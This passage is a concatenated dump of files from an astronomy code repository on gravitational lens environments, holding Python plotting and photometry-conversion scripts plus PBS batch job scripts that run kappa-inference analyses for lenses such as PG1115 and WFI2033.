q_W4_50read[i][q_W4_50read[i] < limit]\n if mode == \"sum\": q_W4_50 = abs(q_W4_50)\n q_W4_75 = q_W4_75read[i][q_W4_75read[i] < limit]\n if mode == \"sum\": q_W4_75 = abs(q_W4_75)\n\n plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange], linestyle='dotted')\n\n if mode == \"sum\":\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W1[i][0],np.average(medsum50W1[i]),std50W1_inf[i],std50W1_sup[i],medsum75W1[i][0],np.average(medsum75W1[i]),std75W1_inf[i],std75W1_sup[i]) # init refers to the zeroth sample, all to all samples combined\n ax.text(0.02, 0.9, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W2[i][0],np.average(medsum50W2[i]),std50W2_inf[i],std50W2_sup[i],medsum75W2[i][0],np.average(medsum75W2[i]),std75W2_inf[i],std75W2_sup[i])\n ax.text(0.02, 0.7, s, fontsize=fontlabel, color='g',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W3[i][0],np.average(medsum50W3[i]),std50W3_inf[i],std50W3_sup[i],medsum75W3[i][0],np.average(medsum75W3[i]),std75W3_inf[i],std75W3_sup[i])\n ax.text(0.02, 0.5, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % 
(medsum50W4[i][0],np.average(medsum50W4[i]),std50W4_inf[i],std50W4_sup[i],medsum75W4[i][0],np.average(medsum75W4[i]),std75W4_inf[i],std75W4_sup[i])\n ax.text(0.02, 0.3, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 init %.3f all %.3f (%.3f %.3f)\" % (np.average([medsum50W1[i][0],medsum50W2[i][0],medsum50W3[i][0],medsum50W4[i][0],medsum75W1[i][0],medsum75W2[i][0],medsum75W3[i][0],medsum75W4[i][0]]),np.average([medsum50W1[i],medsum50W2[i],medsum50W3[i],medsum50W4[i],medsum75W1[i],medsum75W2[i],medsum75W3[i],medsum75W4[i]]),std_inf[i],std_sup[i])\n ax.text(0.02, 0.1, s, fontsize=fontlabel+1, color='k',transform=ax.transAxes)\n if mode == \"meds\":\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W1[i][0],np.median(medsum50W1[i]),std50W1_inf[i],std50W1_sup[i],medsum75W1[i][0],np.median(medsum75W1[i]),std75W1_inf[i],std75W1_sup[i]) # init refers to the zeroth sample, all to all samples combined\n ax.text(0.02, 0.9, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W2[i][0],np.median(medsum50W2[i]),std50W2_inf[i],std50W2_sup[i],medsum75W2[i][0],np.median(medsum75W2[i]),std75W2_inf[i],std75W2_sup[i])\n ax.text(0.02, 0.7, s, fontsize=fontlabel, color='g',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W3[i][0],np.median(medsum50W3[i]),std50W3_inf[i],std50W3_sup[i],medsum75W3[i][0],np.median(medsum75W3[i]),std75W3_inf[i],std75W3_sup[i])\n ax.text(0.02, 0.5, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n s = \"50: init %.3f all %.3f (%.3f %.3f); 75: %.3f %.3f (%.3f %.3f)\" % (medsum50W4[i][0],np.median(medsum50W4[i]),std50W4_inf[i],std50W4_sup[i],medsum75W4[i][0],np.median(medsum75W4[i]),std75W4_inf[i],std75W4_sup[i])\n ax.text(0.02, 0.3, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 init %.3f all %.3f (%.3f %.3f)\" % (np.median([medsum50W1[i][0],medsum50W2[i][0],medsum50W3[i][0],medsum50W4[i][0],medsum75W1[i][0],medsum75W2[i][0],medsum75W3[i][0],medsum75W4[i][0]]),np.median([medsum50W1[i],medsum50W2[i],medsum50W3[i],medsum50W4[i],medsum75W1[i],medsum75W2[i],medsum75W3[i],medsum75W4[i]]),std_inf[i],std_sup[i])\n ax.text(0.02, 0.1, s, fontsize=fontlabel+1, color='k',transform=ax.transAxes)\n print i,s\n if i == 0: plt.xlabel(r'$\\zeta_{gal}$', fontsize=fontabsciss)\n if i == 1: plt.xlabel(r'$\\zeta_{z}$', fontsize=fontabsciss)\n if i == 2: plt.xlabel(r'$\\zeta_{M_\\star}$', fontsize=fontabsciss)\n if i == 3: plt.xlabel(r'$\\zeta_{M^2_\\star}$', fontsize=fontabsciss)\n if i == 4: plt.xlabel(r'$\\zeta_{M^3_\\star}$', fontsize=fontabsciss)\n if i == 5: plt.xlabel(r'$\\zeta_{1/r}$', fontsize=fontabsciss)\n if i == 6: plt.xlabel(r'$\\zeta_{z/r}$', fontsize=fontabsciss)\n if i == 7: plt.xlabel(r'$\\zeta_{M_\\star/r}$', fontsize=fontabsciss)\n if i == 8: plt.xlabel(r'$\\zeta_{M^2_\\star/r}$', fontsize=fontabsciss)\n if i == 9: plt.xlabel(r'$\\zeta_{M^3_\\star/r}$', fontsize=fontabsciss)\n if i == 10: plt.xlabel(r'$\\zeta_{M^2_{\\star\\mathrm{,rms}}}$', fontsize=fontabsciss)\n if i == 11: plt.xlabel(r'$\\zeta_{M^3_{\\star\\mathrm{,rms}}}$', fontsize=fontabsciss)\n if i == 12: plt.xlabel(r'$\\zeta_{M^2_{\\star\\mathrm{,rms}}/r}$', fontsize=fontabsciss)\n if i == 13: plt.xlabel(r'$\\zeta_{M^3_{\\star\\mathrm{,rms}}/r}$', fontsize=fontabsciss)\n if i == 14: plt.xlabel(r'$\\zeta_\\mathrm{flexion}$', fontsize=fontabsciss)\n if i == 15: plt.xlabel(r'$\\zeta_\\mathrm{tidal}$', 
fontsize=fontabsciss)\n if i == 16: plt.xlabel(r'$\\zeta_\\mathrm{SIS}$', fontsize=fontabsciss)\n if i == 17: plt.xlabel(r'$\\zeta_\\mathrm{SIShalo}$', fontsize=fontabsciss)\n if i in [0,4,8,12,15]:\n plt.ylabel(\"Normalized counts\", fontsize=5)\n plt.tick_params(axis='x', labelsize=4)\n plt.tick_params(axis='y', labelsize=4)\n plt.setp(plt.xticks()[1], rotation=90)\n subplot = i+1\n #print \"finished subplot %d/18; fraction of points inside the < %s cut: \\n W1_50 %.3f\\n W2_50 %.3f\\n W3_50 %.3f\\n W4_50 %.3f\" % (subplot, limit, float(q_W1_50.size)/q_W1_50read[0].size, float(q_W2_50.size)/q_W2_50read[0].size, float(q_W3_50.size)/q_W3_50read[0].size, float(q_W4_50.size)/q_W4_50read[0].size)\n\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW1_50%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum50W1.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW1_75%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum75W1.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW2_50%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum50W2.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW2_75%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum75W2.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW3_50%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum50W3.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW3_75%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum75W3.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW4_50%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum50W4.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\nnp.savetxt('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamplesW4_75%s.lst' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), medsum75W4.T, fmt='%1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f %1.3f')\n\nplt.subplots_adjust(left=None, bottom=0.1, right=None, top=0.95, wspace=0.4, 
hspace=0.6)\nplt.subplot(5,4,5)\nplt.legend(bbox_to_anchor=(5, -5), loc='lower right', borderaxespad=0., fontsize=10)\nplt.savefig('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s_%ssamples%s.png' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup, samples, specialtest), dpi=500)\n\n# compute the number of fields used\ntotal50 = 0\ntotal75 = 0\ngood50 = 0\ngood75 = 0\nlst = [x for x in os.listdir(root) if ('_24galphotmstar_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s_count%s.lst' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked,specialtest) in x)]\nfor i in range(len(lst)):\n str = open('%s/%s' %(root,lst[i]),'r').read()\n str = [x.strip() for x in str.split(\" \")]\n str_total50 = int(str[8])\n str_total75 = int(str[6][:-1])\n str_good50 = int(str[7])\n str_good75 = int(str[5])\n if i == 0:\n total50 = str_total50\n total75 = str_total75\n good50 = str_good50\n good75 = str_good75\n else:\n total50 += str_total50\n total75 += str_total75\n good50 += str_good50\n good75 += str_good75\n\nprint '50%: ', good50, '/', total50, ';', '75%: ', good75, '/', total75\nprint(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "c576627a28201e43d12891f8c299f8f8007c505f", "content_id": "c99e896e1010d16530e2cfce5a48904383d4eac4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch2_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb2.out\n#PBS -e Logb2.err\n#PBS -N 2\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 
5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_2_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.5395833253860474, "alphanum_fraction": 0.636904776096344, "avg_line_length": 48.411766052246094, "blob_id": "7f5bc7d964f6cc5eec4a88b5788a6c3072ae0d4d", "content_id": "d3a882ea1635e9ba3a6288a0901b9b0736b22254", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3360, "license_type": "no_license", "max_line_length": 130, "num_lines": 68, "path": "/python/plot_utilities/redshifthistwithgroups.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Given a list of spectroscopic redshifts, plots the histograms and marks the groups previously identified\n##########################\n\n#from matplotlib.colors import LogNorm\n#import scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\n#ax=plt.subplot(111)\nzlim = 1.8\n#maglimit = 21\n#outlim = 0.15\n\nfig = plt.figure(figsize=(5,5))\nax1 = fig.add_subplot(1,1,1)\n#ax1.set(aspect=1)\nax1.set_aspect(1, adjustable='datalim')\nax = plt.subplot(1,1,1, sharex=ax1, sharey=ax1)\n\nz = np.loadtxt(\"/Users/cerusu/Dropbox/Davis_work/code/J1206/spec/J1206_specfromChrisandSDSSusethis.tab\", usecols=[4], unpack=True)\nplt.hist(z[z < zlim], bins = 72, color='k', histtype='step')\n\nz1 = 0.052; z1_size = 10; z1_ra = -133; z1_raerr = 178; z1_dec = 368; z1_decerr = 98\nz2 = 0.123; z2_size = 6; z2_ra = 59; z2_raerr = 203; z2_dec = -212; z2_decerr = 68\nz3 = 0.482; z3_size = 14; z3_ra = -230; z3_raerr = 67; z3_dec = -41; z3_decerr = 93\nz4 = 0.551; z4_size = 27; z4_ra = 127; z4_raerr = 98; z4_dec = -171; z4_decerr = 64\nz5 = 0.688; z5_size = 16; z5_ra = 92; z5_raerr = 68; z5_dec = -112; z5_decerr = 47\nz6 = 0.750; z6_size = 28; z6_ra = -18; z6_raerr = 49; z6_dec = 5; z6_decerr = 23\nz7 = 0.778; z7_size = 4; z7_ra = -227; z7_raerr = 30; z7_dec = -94; z7_decerr = 34\n\nplt.axvline(x=z1, color='k', linestyle='--')\nplt.axvline(x=z2, color='k', linestyle='--')\nplt.axvline(x=z3, color='k', linestyle='--')\nplt.axvline(x=z4, color='k', linestyle='--')\nplt.axvline(x=z5, color='k', linestyle='--')\nplt.axvline(x=z6, color='k', linestyle='--')\nplt.axvline(x=z7, color='k', linestyle='--')\n\n#x = x[abs(y) <= zlim]\n#y = y[abs(y) <= zlim]\n#plt.scatter(x,y, color='k')\n#plt.scatter(x, y)\ntxt1 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z1,z1_size,z1_ra,z1_raerr,z1_dec,z1_decerr)\ntxt2 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z2,z2_size,z2_ra,z2_raerr,z2_dec,z2_decerr)\ntxt3 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z3,z3_size,z3_ra,z3_raerr,z3_dec,z3_decerr)\ntxt4 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z4,z4_size,z4_ra,z4_raerr,z4_dec,z4_decerr)\ntxt5 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z5,z5_size,z5_ra,z5_raerr,z5_dec,z5_decerr)\ntxt6 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z6,z6_size,z6_ra,z6_raerr,z6_dec,z6_decerr)\ntxt7 = \"%.3f %s %s$\\pm$%s %s$\\pm$%s\" % (z7,z7_size,z7_ra,z7_raerr,z7_dec,z7_decerr)\n#stdout = \"scatter = %.3f\" % std\nplt.text(0.5, 0.9, txt1, fontsize=9, color='black', transform=ax.transAxes)\nplt.text(0.5, 0.8, txt2, fontsize=9, color='black', transform=ax.transAxes)\nplt.text(0.5, 0.7, txt3, fontsize=9, color='black', 
transform=ax.transAxes)\nplt.text(0.5, 0.6, txt4, fontsize=9, color='black', transform=ax.transAxes)\nplt.text(0.5, 0.5, txt5, fontsize=9, color='black', transform=ax.transAxes)\nplt.text(0.5, 0.4, txt6, fontsize=9, color='black', transform=ax.transAxes)\nplt.text(0.5, 0.3, txt7, fontsize=9, color='black', transform=ax.transAxes)\nplt.xlabel('spectroscopic redshift')\nplt.ylabel('number of galaxies')\nplt.xlim(0, zlim)\n#plt.ylim(0, zlim)\n#ax1.set_yticklabels(np.arange(0.0, zlim, 0.2))\n#ax1.set_xticklabels(np.arange(0.0, zlim, 0.2))\n#plt.subplots_adjust(bottom=0.1, left =0.2, right=0.9, top=0.90, wspace=0, hspace=0)\n#plt.tight_layout()\n#fig.text(0.05, 0.5, 'photo-z', ha='center', va='center', size='20', rotation='vertical')\n#plt.title('HE0435 ugri specz-photz')\nplt.savefig('/Users/cerusu/Dropbox/Davis_work/code/J1206/speczhist.pdf')\n" }, { "alpha_fraction": 0.6287500262260437, "alphanum_fraction": 0.7537500262260437, "avg_line_length": 60.53845977783203, "blob_id": "8a734e190c96b02b8cd33d41ddb931a9833d23ad", "content_id": "d797d208199480c2826d14500d8d777051c1f2c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 800, "license_type": "no_license", "max_line_length": 189, "num_lines": 13, "path": "/python/catalogue_utilities/combine_distributions.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Use to combine a certain kappa distribution in case it could not be computed at once from the 64 MS fields. Normalizes before summing. \n\nimport numpy as np\n\nroot = \"/Users/cerusu/Dropbox/\"\n\ndata1 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap0.61_0.71_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_23_meds_increments2_2_2_2_part1.cat\" % root, usecols=[0], unpack=True)\ndata2 = np.loadtxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap0.61_0.71_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_23_meds_increments2_2_2_2_part2.cat\" % root, usecols=[0], unpack=True)\n\ndata1 = data1 / np.sum(data1)\ndata2 = data2 / np.sum(data2)\n\nnp.savetxt(\"%skappahist_WFI2033_5innermask_nobeta_zgap0.61_0.71_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_23_meds_increments2_2_2_2.cat\" % root, data1 + data2)\n" }, { "alpha_fraction": 0.6746323704719543, "alphanum_fraction": 0.7665441036224365, "avg_line_length": 26.200000762939453, "blob_id": "7369e44ddccfc644ea09ec30d9aaea5b37d18c59", "content_id": "ea5beecbea706135e5899416d3b92a8b4e8f52ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 544, "license_type": "no_license", "max_line_length": 77, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim5.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log5s.out\n#PBS -e Log5s.err\n#PBS -N 5s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr mass\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr mass\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr mass\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr mass\n" }, { "alpha_fraction": 0.5455713868141174, "alphanum_fraction": 0.6018929481506348, "avg_line_length": 58.43055725097656, "blob_id": "9bd08f108ac4c95e75d9a51d4355f32c100e6e1d", "content_id": 
"98614cc3c285facea99c5a7a60bfa15cb3eaab39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8558, "license_type": "no_license", "max_line_length": 409, "num_lines": 144, "path": "/python/catalogue_utilities/converttobpz_ugrizYJHK.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# The code is used to convert raw matched photometric catalogues (with matched PSFs) into BPZ-expected input files, except that the ID, image/world coordinates, flux radii and flags are still included. The code uses the measured 1-sigma mag limits to treat non-detections (not yet non-exposures). The code applies a MAG_ISO -> MAG_AUTO conversion. The conversion is as follows:\n# for detections in i+r: auto_x = iso_x + average(auto_r_noconv - iso_r, auto_i_noconv - iso_i)\n# for detections in i: auto_x = iso_x + auto_i_noconv - iso_i\n# This expresion is useful to find total mags for photoz (with luminosity priors) and stellar mass computation, but ignores color gradients, as described in Erben et al. 2014\n##########################\n\n# Careful, because the columns ID changes depending on the input file; also, change the 1-sigma detection limits as appropriate\n# Before running, make sure that the mag_iso_i columns in the convolved frame contains no 99 or -99, because it is used for the conversions; in the case of detections in ir only, also mag_iso_r\n\nimport numpy as np \n\nfile = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033analysis/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23.cat\"\n#file = \"/Users/eduardrusu/Desktop/WFI2033/WFI2033analysis/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23.cat\"\n\n# I calculated the 5-sigma limits, now convert to 1-sigma\nlimit_u = 24.25 + 1.74 # AB; u-band is not updated\nlimit_g = 23.77 + 1.74 # AB\nlimit_r = 23.81 + 1.74 # AB\nlimit_i = 23.18 + 1.74 # AB\nlimit_z = 22.91 + 1.74 # AB\nlimit_Y = 21.40 + 1.74 # AB\nlimit_J = 20.63 + 1.74 # Vega\nlimit_H = 19.52 + 1.74 # Vega\nlimit_K = 18.87 + 1.74 # Vega\n\nif \"detect_i_and_ir\" in file:\n xpix = 0\n ypix = 1\n xwcs = 2\n ywcs = 3\n id = 4 # detections in i\n flx_rad = 8 # measurement in i, detection in i\n flg = 16\n auto_i_noconv_detecti = 12\n auto_i_noconv_detecti_err = 13\n iso_u = 41\n iso_u_err = 42\n iso_g = 45\n iso_g_err = 46\n iso_r = 49\n iso_r_err = 50\n iso_i = 53\n iso_i_err = 54\n iso_z = 57\n iso_z_err = 58\n iso_Y = 61\n iso_Y_err = 62\n iso_J = 65\n iso_J_err = 66\n iso_H = 69\n iso_H_err = 70\n iso_K = 73\n iso_K_err = 74\nelse:\n xpix = 0\n ypix = 1\n xwcs = 2\n ywcs = 3\n id = 4 # detections in i\n flx_rad = 17 # measurement in i\n flg = 13\n auto_r_noconv = 9\n auto_r_noconv_err = 10\n auto_i_noconv = 18\n auto_i_noconv_err = 19\n iso_u = 24\n iso_u_err = 25\n iso_g = 28\n iso_g_err = 29\n iso_r = 32\n iso_r_err = 33\n iso_i = 36\n iso_i_err = 37\n iso_z = 40\n iso_z_err = 41\n iso_Y = 44\n iso_Y_err = 45\n iso_J = 48\n iso_J_err = 49\n iso_H = 52\n iso_H_err = 53\n iso_K = 56\n iso_K_err = 57\n\ndata = np.loadtxt(file,unpack=True)\n\n# m = 99.0, dm = 28.4 -- example of a non-detection: dm = 1-sigma detection limit\ndata[iso_u_err][data[iso_u] > limit_u] = limit_u\ndata[iso_u][data[iso_u] > limit_u] = 99.0\ndata[iso_g_err][data[iso_g] > limit_g] = limit_g\ndata[iso_g][data[iso_g] > limit_g] = 99.0\ndata[iso_r_err][data[iso_r] > limit_r] = limit_r\ndata[iso_r][data[iso_r] > limit_r] = 99.0\ndata[iso_i_err][data[iso_i] > limit_i] = 
limit_i\ndata[iso_i][data[iso_i] > limit_i] = 99.0\ndata[iso_z_err][data[iso_z] > limit_z] = limit_z\ndata[iso_z][data[iso_z] > limit_z] = 99.0\ndata[iso_Y_err][data[iso_Y] > limit_Y] = limit_Y\ndata[iso_Y][data[iso_Y] > limit_Y] = 99.0\ndata[iso_J_err][data[iso_J] > limit_J] = limit_J\ndata[iso_J][data[iso_J] > limit_J] = 99.0\ndata[iso_H_err][data[iso_H] > limit_H] = limit_H\ndata[iso_H][data[iso_H] > limit_H] = 99.0\ndata[iso_K_err][data[iso_K] > limit_K] = limit_K\ndata[iso_K][data[iso_K] > limit_K] = 99.0\n\n# implement the iso -> auto correction, but only for mags != 99,-99\nif \"detect_i_and_ir\" in file:\n isoauto = data[auto_i_noconv_detecti] - data[iso_i]\n isoauto[np.abs(data[iso_i]) == 99.0] = 0\n data[iso_u][np.abs(data[iso_u]) != 99.0] = data[iso_u][np.abs(data[iso_u]) != 99.0] + isoauto[np.abs(data[iso_u]) != 99.0]\n data[iso_g][np.abs(data[iso_g]) != 99.0] = data[iso_g][np.abs(data[iso_g]) != 99.0] + isoauto[np.abs(data[iso_g]) != 99.0]\n data[iso_r][np.abs(data[iso_r]) != 99.0] = data[iso_r][np.abs(data[iso_r]) != 99.0] + isoauto[np.abs(data[iso_r]) != 99.0]\n data[iso_i][np.abs(data[iso_i]) != 99.0] = data[iso_i][np.abs(data[iso_i]) != 99.0] + isoauto[np.abs(data[iso_i]) != 99.0]\n data[iso_z][np.abs(data[iso_z]) != 99.0] = data[iso_z][np.abs(data[iso_z]) != 99.0] + isoauto[np.abs(data[iso_z]) != 99.0]\n data[iso_Y][np.abs(data[iso_Y]) != 99.0] = data[iso_Y][np.abs(data[iso_Y]) != 99.0] + isoauto[np.abs(data[iso_Y]) != 99.0]\n data[iso_J][np.abs(data[iso_J]) != 99.0] = data[iso_J][np.abs(data[iso_J]) != 99.0] + isoauto[np.abs(data[iso_J]) != 99.0]\n data[iso_H][np.abs(data[iso_H]) != 99.0] = data[iso_H][np.abs(data[iso_H]) != 99.0] + isoauto[np.abs(data[iso_H]) != 99.0]\n data[iso_K][np.abs(data[iso_K]) != 99.0] = data[iso_K][np.abs(data[iso_K]) != 99.0] + isoauto[np.abs(data[iso_K]) != 99.0]\nelse:\n isoauto = 